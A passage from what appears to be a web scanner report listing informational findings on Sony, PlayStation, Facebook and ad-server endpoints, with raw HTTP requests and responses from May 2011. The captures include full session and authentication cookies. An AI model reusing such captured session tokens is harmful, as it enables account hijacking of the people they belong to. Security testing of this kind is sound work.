Set-Cookie: vuday1=!!!!#%)0sHNDf0(/46FU; path=/; expires=Tue, 17-May-2011 00:00:00 GMT
Set-Cookie: BX=edn6q5d6t078b&b=4&s=k0&t=135; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Set-Cookie: liday1=>r[i<NDf0(+[pFB; path=/; expires=Tue, 17-May-2011 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 16 May 2011 01:25:36 GMT
Pragma: no-cache
Content-Length: 836
Content-Type: application/x-javascript
Age: 0
Proxy-Connection: close

document.write('<a target=\"_blank\" href=\"http://ads.bluelithium.com/clk?2,13%3B31ef04ecc67e7c60%3B12ff66888b2,0%3B%3B%3B986754062,AAAAALzkFwDi.Y4AAAAAANGDIwAAAAAAAgAAAAYAAAAAAP8AAAABFWsaJQAAAAAAUJcuAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACImw8AAAAAAAIAAgAAAAAAqodo9i8BAAAAAAAAADY2YjRiNmU0LTdmNWItMTFlMC05ZjE1LTg3MmU3N2M1YmI2NQAZ.gEAAAA=,,,\"><img border=\"0\" alt=\"\" height=\"90\" width=\"728\" src=\"http://content.yieldmanager.edgesuite.net/atoms/81/55/2b/08/81552b08194d383d9ad8d8d441bd42fc.jpg\"></img></a><img src=\"http://altfarm.mediaplex.com/ad/tr/15312-119052-1039-35?mpt=[CACHEBUSTER]\" height=\"1\" width=\"1\" alt=\"\">');
var rm_data = new Object();
rm_data.creative_id = 9371106;
rm_data.offer_type = 19;
rm_data.entity_id = 336829;
if (window.rm_crex_data) {rm_crex_data.push(9371106);}

19.3. http://login.dotomi.com/ucm/UCMController previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://login.dotomi.com
Path:	/ucm/UCMController

Request 1

GET /ucm/UCMController?dtm_com=28&dtm_cid=2296&dtm_cmagic=130f1a&dtm_fid=101&dtm_format=5&dtm_user_id=&dtmc_life_stage_indicator=1&cli_promo_id=1&dtmc_ref= HTTP/1.1
Host: login.dotomi.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=173.193.214.243.1305509455494172

Response 1

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:38:30 GMT
X-Name: dmc-o01
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, private
P3P: "policyref="/w3c/p3p.xml", CP="NOI DSP NID OUR STP""
Content-Type: text/html
Content-Length: 191

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<meta http-equiv="Content-Type" content="text/html;charset=UTF-8">
</head>

<body>

</body>
</html>

Request 2

GET /ucm/UCMController?dtm_com=28&dtm_cid=2296&dtm_cmagic=130f1a&dtm_fid=101&dtm_format=5&dtm_user_id=&dtmc_life_stage_indicator=1&cli_promo_id=1&dtmc_ref= HTTP/1.1
Host: login.dotomi.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=173.193.214.243.1305509455494172

Response 2

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:38:34 GMT
X-Name: dmc-o01
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, private
P3P: "policyref="/w3c/p3p.xml", CP="NOI DSP NID OUR STP""
Set-Cookie: DotomiUser=330100732990471260$0$1803909031$$1; Domain=.dotomi.com; Expires=Wed, 15-May-2013 01:38:34 GMT; Path=/
Set-Cookie: DotomiSession_2296=2_370200731261817482$330100732990471260$1803909031$1305509914502; Domain=.dotomi.com; Path=/
Set-Cookie: DotomiNet=2$DjQqblZ1RXdFAmZaAgZ%2BXQFHLjhAewFTXQwkBj0cKD8JfQsBAwRDS1dOFilKSEhYaWNYfGxkUXRCcEYBZFw%3D; Domain=.dotomi.com; Expires=Wed, 15-May-2013 01:38:34 GMT; Path=/
Set-Cookie: DotomiRR2296=-1$1$1$; Domain=.dotomi.com; Expires=Tue, 17-May-2011 01:38:34 GMT; Path=/
Content-Type: text/html
Content-Length: 1577

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<meta http-equiv="Content-Type" content="text/html;charset=UTF-8">
</head>

<body>
<script language="JavaScript" type="text/javascript" charset="UTF-8">
var cgver = ("18728" != "" ? parseInt("18728") : -1);
var rccg = ("42" != "" ? parseInt("42") : 0);
var dmcg = ("" != "" ? parseInt("") : 0);
    var dnc = ("" == "1" ? 1 : 0);
var secure = false;
var imps = ("300" != "" ? parseInt("300") : 1000);
    var utoken = "WH9qYld2QnJADW1dBwV6XwZTaXsQdwlHClRgXlJKYQ%3D%3D";
if((cgver >= 0) && (!dnc) && ((dmcg > 0) || ((rccg > 0) && (imps > 0)))){
var akurl = "";
if (secure){
akurl = "https://a248.e.akamai.net/7/248/14564/" + cgver + "/secure.dtmpub.com/js/ncg6/" + "42/optin_2296_7660.js";
}
else
{
akurl = "http://cache.dtmpub.com/js/ncg6/42/optin_2296_7660.js?cgver=" + cgver;
           akurl = akurl.replace("optin_", "optinrt_");
}

document.write('<scr'+'ipt type="text/javascript" language="JavaScript" src="' + akurl + '" charset="UTF-8"></scr'+'ipt>');
}
   document.write('');

if((true) && (("true" != "" ? true : 0)) && (("1" == "1" ? 1 : 0))){
   document.write('<img src="/ucm/D
...[SNIP]...

19.4. http://us.playstation.com/uwps/UsplaystationBlogs previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://us.playstation.com
Path:	/uwps/UsplaystationBlogs

Request 1

GET /uwps/UsplaystationBlogs?url=http://blog.us.playstation.com/category/psn/&count=4&type=H&sid=0.028556024888530374 HTTP/1.1
Host: us.playstation.com
Proxy-Connection: keep-alive
Referer: http://us.playstation.com/psn/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E81B82051D2A0E-60000127A0560B82[CE]; s_pers=%20gpv_pageName%3DPSN_UPDATE/UNAUTHORIZED_INTERUSION_ALERT/LEARN_MORE/PS%7C1305493200691%3B%20s_nr%3D1305491400694-New%7C1337027400694%3B%20s_pv%3DPSN_UPDATE/UNAUTHORIZED_INTERUSION_ALERT/LEARN_MORE/PS%7C1305493200696%3B; s_sess=%20s_cc%3Dtrue%3B%20s_ppv%3D45%3B%20s_sq%3Dsceaplaystationprod%253D%252526pid%25253DPSN_UPDATE/UNAUTHORIZED_INTERUSION_ALERT/LEARN_MORE/PS%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//us.playstation.com/psn/index.htm%252526ot%25253DA%3B; mbox=session#1305491190457-245340#1305493263|PC#1305491190457-245340.17#1306701003|check#true#1305491463; APPLICATION_SITE_URL=http%3A//us.playstation.com/psn/; APPLICATION_SIGNOUT_URL=http%3A//us.playstation.com/psn/; JSESSIONID=ChgmNQ3KHJXFHnKcQ3Q29mnfpk114VH3JQ6fGJyb1vBQfNb1n3WM!-1017625142

Response 1

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:30:07 GMT
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 3356

<div class="grid"><div class="gridInner"><div class="item"><div class="itemInner"><div class="top"><h4 class="fixHeight">Play On ... PSN Restoration...</h4><p>Thank you for your patience and encouragement over the last few weeks. As covered in the post from earlier today, you can...</p><a Onclick="pageTracker._trackPageview('/CTR/Blog/http://blog.us.playstation.com/2011/05/14/play-on-%e2%80%93-psn-restoration-begins-now/');ClickWTB(this,'event3');" class="read" href="http://blog.us.playstation.com/2011/05/14/play-on-%e2%80%93-psn-restoration-begins-now/">Read</a></div><div class="byline"><h5><a Onclick="pageTracker._trackPageview('/CTR/Blog/http://blog.us.playstation.com/2011/05/14/play-on-%e2%80%93-psn-restoration-begins-now/');ClickWTB(this,'event3');" href="http://blog.us.playstation.com/2011/05/14/play-on-%e2%80%93-psn-restoration-begins-now/">PlayStation Blog</a></h5><p>May 14, 2011</p></div></div></div><div class="item"><div class="itemInner"><div class="top"><h4 class="fixHeight">Kazuo Hirai: PlayStation...</h4><p></p><a Onclick="pageTracker._trackPageview('/CTR/Blog/http://blog.us.playstation.com/2011/05/14/kazuo-hirai-playstation-network-relaunch-announcement/');ClickWTB(this,'event3');" class="read" href="http://blog.us.playstation.com/2011/05/14/kazuo-hirai-playstation-network-relaunch-announcement/">Read</a></div><div class="byline"><h5><a Onclick="pageTracker._trackPageview('/CTR/Blog/http://blog.us.playstation.com/2011/05/14/kazuo-hirai-playstation-network-relaunch-announcement/');ClickWTB(this,'event3');" href="http://blog.us.playstation.com/2011/05/14/kazuo-hirai-playstation-network-relaunch-announcement/">PlayStation Blog</a></h5><p>May 14, 2011</p></div></div></div><div class="item"><div class="itemInner"><div class="top"><h4 class="fixHeight">PS3 System Software Upda
...[SNIP]...

Request 2

GET /uwps/UsplaystationBlogs?url=http://blog.us.playstation.com/category/psn/&count=4&type=H&sid=0.028556024888530374 HTTP/1.1
Host: us.playstation.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E81B82051D2A0E-60000127A0560B82[CE]; s_pers=%20gpv_pageName%3DPSN_UPDATE/UNAUTHORIZED_INTERUSION_ALERT/LEARN_MORE/PS%7C1305493200691%3B%20s_nr%3D1305491400694-New%7C1337027400694%3B%20s_pv%3DPSN_UPDATE/UNAUTHORIZED_INTERUSION_ALERT/LEARN_MORE/PS%7C1305493200696%3B; s_sess=%20s_cc%3Dtrue%3B%20s_ppv%3D45%3B%20s_sq%3Dsceaplaystationprod%253D%252526pid%25253DPSN_UPDATE/UNAUTHORIZED_INTERUSION_ALERT/LEARN_MORE/PS%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//us.playstation.com/psn/index.htm%252526ot%25253DA%3B; mbox=session#1305491190457-245340#1305493263|PC#1305491190457-245340.17#1306701003|check#true#1305491463; APPLICATION_SITE_URL=http%3A//us.playstation.com/psn/; APPLICATION_SIGNOUT_URL=http%3A//us.playstation.com/psn/; JSESSIONID=ChgmNQ3KHJXFHnKcQ3Q29mnfpk114VH3JQ6fGJyb1vBQfNb1n3WM!-1017625142

Response 2

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 20:30:24 GMT
Server: Apache
Cteonnt-Length: 703
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 703

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
</head>
<body>


<script type="text/javascript">
window.location.href = 'http://us.playstation.com/pagenotfound/index.htm';
</script>
</body>
</html>

19.5. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/plugins/like.php

Request 1

GET /plugins/like.php?action=like&api_key=151297214929498&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df252ad6968%26origin%3Dhttp%253A%252F%252Fblog.us.playstation.com%252Ff17beecc88%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&href=http%3A%2F%2Fblog.us.playstation.com%2F2011%2F05%2F14%2Fplay-on-%25e2%2580%2593-psn-restoration-begins-now%2F&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://blog.us.playstation.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.24.45
X-Cnection: close
Date: Sun, 15 May 2011 20:27:08 GMT
Content-Length: 9358

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="connect_widget_4dd0371c0a0dd5807236342" class="connect_widget button_count" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider"><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center connect_widget_confirm_cell"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_button_count_including hidden_elem"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="thumbs_up hidden_elem"></div></td><td><div class="undo hidden_elem"></div></td></tr><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">148K</div></td></tr></tbody></table></td><td class="connect_widget_button_count_excluding"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">148K</div></td></tr></tbody></table></td></tr></table></div></div><script type="text/javascript">
Env={module:"like_widget",impid:"6f2fa844",user:0,locale:"en_US",method:"GET",start:(new Date()).getTime(),ps_limit:5,ps_ratio:4,svn_rev:378427,vip:"69.171.224.39",static_base:"http:\/\/static.ak.fbcdn.net\/",www_base:"http:\/\/www.facebook.com\/",rep_lag:2,fb_dtsg:"-rYxz",lhsh:"45dcb",tracking_domain:"http:\/\/pixel.facebook.com",retry_ajax_on_network_error:"1",ajaxpipe_enabled:"1",no_cookies:1};
</script>
<script type="text/javascript">Bootloader.setResourceMap({"J324q":{"type":"css","permanent":1,"src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/v1\/yh\/r\/HD3OAbjOVTn.css"},"V02Ya":{"type":"css","permanent":1,"src":"http:\/\/static.ak.fbcdn.net\/rsrc.
...[SNIP]...

Request 2

GET /plugins/like.php?action=like&api_key=151297214929498&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df252ad6968%26origin%3Dhttp%253A%252F%252Fblog.us.playstation.com%252Ff17beecc88%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&href=http%3A%2F%2Fblog.us.playstation.com%2F2011%2F05%2F14%2Fplay-on-%25e2%2580%2593-psn-restoration-begins-now%2F&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.78.26
X-Cnection: close
Date: Sun, 15 May 2011 20:27:30 GMT
Content-Length: 9326

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="connect_widget_4dd03732a530f4916888972" class="connect_widget button_count" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider"><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center connect_widget_confirm_cell"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_button_count_including hidden_elem"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="thumbs_up hidden_elem"></div></td><td><div class="undo hidden_elem"></div></td></tr><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">148K</div></td></tr></tbody></table></td><td class="connect_widget_button_count_excluding"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">148K</div></td></tr></tbody></table></td></tr></table></div></div><script type="text/javascript">
Env={module:"like_widget",impid:"8b51ff80",user:0,locale:"en_US",method:"GET",start:(new Date()).getTime(),ps_limit:5,ps_ratio:4,svn_rev:378427,vip:"69.171.224.39",static_base:"http:\/\/static.ak.fbcdn.net\/",www_base:"http:\/\/www.facebook.com\/",rep_lag:2,fb_dtsg:"-rYxz",lhsh:"45dcb",tracking_domain:"http:\/\/pixel.facebook.com",retry_ajax_on_network_error:"1",ajaxpipe_enabled:"1",no_cookies:1};
</script>
<script type="text/javascript">Bootloader.setResourceMap({"J324q":{"type":"css","permanent":1,"src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/v1\/yh\/r\/HD3OAbjOVTn.css"},"V02Ya":{"type":"css","permanent":1,"src":"http:\/\/static.ak.fbcdn.net\/rsrc.
...[SNIP]...

19.6. https://www.sonystyle.com/webapp/wcs/stores/servlet/LogonForm previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://www.sonystyle.com
Path:	/webapp/wcs/stores/servlet/LogonForm

Request 1

GET /webapp/wcs/stores/servlet/LogonForm?storeId=10151&langId=-1&catalogId=10551&URL=SYAccountProfileView HTTP/1.1
Host: www.sonystyle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551&eid=409204880
Cookie: TS5bbf46=f5a3eb9e27e2bffb98b2405b1503cf8878ed098d530cefc94dd0437160ac0ec518a9cd87529ede9f11ea93b61389de873146ef5f529ede9ff3fa25813fc776346bd26e6edb2332024890f70e222f7b4e4890f70e4b9b8efe5667a7cd4deb37804890f70ef7bac4d65cd85ce1ea147da6fb05aed8; mbox=check#true#1305494554|session#1305494389047-605069#1305496354|PC#1305494389047-605069.17#1306704094; s_cc=true; s_visit=1; s_sq=sonysonystyle2007prod%3D%2526pid%253DSony%252520Store%2526pidt%253D1%2526oid%253Dhttps%25253A//www.sonystyle.com/webapp/wcs/stores/servlet/LogonForm%25253FstoreId%25253D10151%252526langId%25253D-1%252526catalogId%25253D1055%2526ot%253DA; fsr.s={"v":1,"rid":"1305494398924_849794","cp":{"cybershot":"N","innovation":"N","experts":"N"},"pv":5,"c":"https://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay","lc":{"d0":{"v":5,"s":true,"e":2}},"cd":0,"sd":0}; s_vi=[CS]v1|26E821BE851631F8-400001A4801F70D4[CE]; JSESSIONID=0000swi2mynvgN0b4v4Ck42F0Ou:14aelsmcl; WC_PERSISTENT=tibXcp5Dlk4Jh%2fA0Lwms1Uargj4%3d%0a%3b2011%2d05%2d15+17%3a21%3a17%2e83%5f1305494403722%2d66941%5f10151%5f239700478%2c%2d1%2cUSD%5f10151; WC_SESSION_ESTABLISHED=true; WC_ACTIVEPOINTER=%2d1%2c10151; BIGipServerlivenew.sonystyle.com-80=1988239776.20480.0000; 71737897-VID=16601155425835; 71737897-SKEY=1547318312735205030; HumanClickSiteContainerID_71737897=STANDALONE; WC_USERACTIVITY_239700478=239700478%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cW0B82C6kt%2fu1ZnIDD%2bD9cyUsUuZ5p6eV3VX9sG%2bxOfyS%2fVahUux21ujZk%2fh12gxePDRShlaYz5Kb%0arseHaKhahut2Hi0TlmPEHwulUbbCf3yqB5j8879HQFm5kyylh3cBPYT%2fYDZLv6Pzx7s%2b8JmOJA%3d%3d; WC_AUTHENTICATION_239700478=239700478%2cPqxvbxzhgcoXK6H6uawMpABBdk0%3d

Response 1

HTTP/1.1 200 OK
ntCoent-Length: 87984
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 87984
Vary: Accept-Encoding
Date: Sun, 15 May 2011 21:24:04 GMT
Connection: keep-alive
Cache-Control: private
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: No-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>

<script type="text/javascript" src="//nexus2.e
...[SNIP]...
<input type="hidden" value="https://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551&eid=409204880" name="redirectURL"/>
</form>
</div>
<div id="registrationFormSection" class="formSections">
<form action="SYUserRegistrationUpdate" method="post" id="registrationForm" name="registrationForm">
<h3 class="formPageHeader">
Register
</h3>
<ul class="formPageEntryList">
<fieldset id="basicInformation" class="boxFields">
<li class="formPageEntryItem">
<label class="label" for="logonId">
E-mail Address:
</label>
<input type="text" maxlength="254" value="" name="logonId" id="logonId" class="text validate-email-custom" caption="(this is your username for future access)"/>
</li>
<li class="formPageEntryItem">
<label class="label" for="logonId">
New Password:
</label>
<input type="password" maxlength="25" value="" id="logonPassword" name="logonPassword" caption="8-25 letters and numbers"
class="text validate-password "
/>
</li>
<li class="formPageEntryItem">
<label class="label" for="logonId">
Confirm Password:
</label>
<input type="password" maxlength="25" value="" id="logonPasswordVerify" name="logonPasswordVerify"
class="text validate-passwordconfirm "
/>
</li>
<li class="formPageEntryItem">
<input type="checkbox" class="checkbox" value="true" name="rememberMe" id="rememberMe"/>
<label class="label checkbox rememberMe" for="rememberMe">Remember me on this computer</label>
<a href="#whatsThisPopUp" class="infoLinks lightwindow page-options">
What's this?
</a>
</li>
<li class="formPageEntryItem">
<input type="checkbox" class="checkbox" name="newsletter" id="newsletter" value="10171" checked />
<label class="label checkbox emailOptIn" for="newsletter">
Keep me informed about Sony special offers, exclusive products and new product information.
</label>
</li>
<li class="formPageEntryItem">
<label class="label" for="submitButton"></label>
<a class="createButton seoImage" id="submitButton" href="#">Submit
</a>
</li>
<li class="formPageEntryItem">

...[SNIP]...

Request 2

GET /webapp/wcs/stores/servlet/LogonForm?storeId=10151&langId=-1&catalogId=10551&URL=SYAccountProfileView HTTP/1.1
Host: www.sonystyle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: TS5bbf46=f5a3eb9e27e2bffb98b2405b1503cf8878ed098d530cefc94dd0437160ac0ec518a9cd87529ede9f11ea93b61389de873146ef5f529ede9ff3fa25813fc776346bd26e6edb2332024890f70e222f7b4e4890f70e4b9b8efe5667a7cd4deb37804890f70ef7bac4d65cd85ce1ea147da6fb05aed8; mbox=check#true#1305494554|session#1305494389047-605069#1305496354|PC#1305494389047-605069.17#1306704094; s_cc=true; s_visit=1; s_sq=sonysonystyle2007prod%3D%2526pid%253DSony%252520Store%2526pidt%253D1%2526oid%253Dhttps%25253A//www.sonystyle.com/webapp/wcs/stores/servlet/LogonForm%25253FstoreId%25253D10151%252526langId%25253D-1%252526catalogId%25253D1055%2526ot%253DA; fsr.s={"v":1,"rid":"1305494398924_849794","cp":{"cybershot":"N","innovation":"N","experts":"N"},"pv":5,"c":"https://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay","lc":{"d0":{"v":5,"s":true,"e":2}},"cd":0,"sd":0}; s_vi=[CS]v1|26E821BE851631F8-400001A4801F70D4[CE]; JSESSIONID=0000swi2mynvgN0b4v4Ck42F0Ou:14aelsmcl; WC_PERSISTENT=tibXcp5Dlk4Jh%2fA0Lwms1Uargj4%3d%0a%3b2011%2d05%2d15+17%3a21%3a17%2e83%5f1305494403722%2d66941%5f10151%5f239700478%2c%2d1%2cUSD%5f10151; WC_SESSION_ESTABLISHED=true; WC_ACTIVEPOINTER=%2d1%2c10151; BIGipServerlivenew.sonystyle.com-80=1988239776.20480.0000; 71737897-VID=16601155425835; 71737897-SKEY=1547318312735205030; HumanClickSiteContainerID_71737897=STANDALONE; WC_USERACTIVITY_239700478=239700478%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cW0B82C6kt%2fu1ZnIDD%2bD9cyUsUuZ5p6eV3VX9sG%2bxOfyS%2fVahUux21ujZk%2fh12gxePDRShlaYz5Kb%0arseHaKhahut2Hi0TlmPEHwulUbbCf3yqB5j8879HQFm5kyylh3cBPYT%2fYDZLv6Pzx7s%2b8JmOJA%3d%3d; WC_AUTHENTICATION_239700478=239700478%2cPqxvbxzhgcoXK6H6uawMpABBdk0%3d

Response 2

HTTP/1.1 200 OK
ntCoent-Length: 87734
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Date: Sun, 15 May 2011 21:25:38 GMT
Content-Length: 87734
Connection: keep-alive
Vary: Accept-Encoding
Cache-Control: private
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: No-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>

<script type="text/javascript" src="//nexus2.e
...[SNIP]...
<input type="hidden" value="" name="redirectURL"/>
</form>
</div>
<div id="registrationFormSection" class="formSections">
<form action="SYUserRegistrationUpdate" method="post" id="registrationForm" name="registrationForm">
<h3 class="formPageHeader">
Register
</h3>
<ul class="formPageEntryList">
<fieldset id="basicInformation" class="boxFields">
<li class="formPageEntryItem">
<label class="label" for="logonId">
E-mail Address:
</label>
<input type="text" maxlength="254" value="" name="logonId" id="logonId" class="text validate-email-custom" caption="(this is your username for future access)"/>
</li>
<li class="formPageEntryItem">
<label class="label" for="logonId">
New Password:
</label>
<input type="password" maxlength="25" value="" id="logonPassword" name="logonPassword" caption="8-25 letters and numbers"
class="text validate-password "
/>
</li>
<li class="formPageEntryItem">
<label class="label" for="logonId">
Confirm Password:
</label>
<input type="password" maxlength="25" value="" id="logonPasswordVerify" name="logonPasswordVerify"
class="text validate-passwordconfirm "
/>
</li>
<li class="formPageEntryItem">
<input type="checkbox" class="checkbox" value="true" name="rememberMe" id="rememberMe"/>
<label class="label checkbox rememberMe" for="rememberMe">Remember me on this computer</label>
<a href="#whatsThisPopUp" class="infoLinks lightwindow page-options">
What's this?
</a>
</li>
<li class="formPageEntryItem">
<input type="checkbox" class="checkbox" name="newsletter" id="newsletter" value="10171" checked />
<label class="label checkbox emailOptIn" for="newsletter">
Keep me informed about Sony special offers, exclusive products and new product information.
</label>
</li>
<li class="formPageEntryItem">
<label class="label" for="submitButton"></label>
<a class="createButton seoImage" id="submitButton" href="#">Submit
</a>
</li>
<li class="formPageEntryItem">
<label class="label"></label>
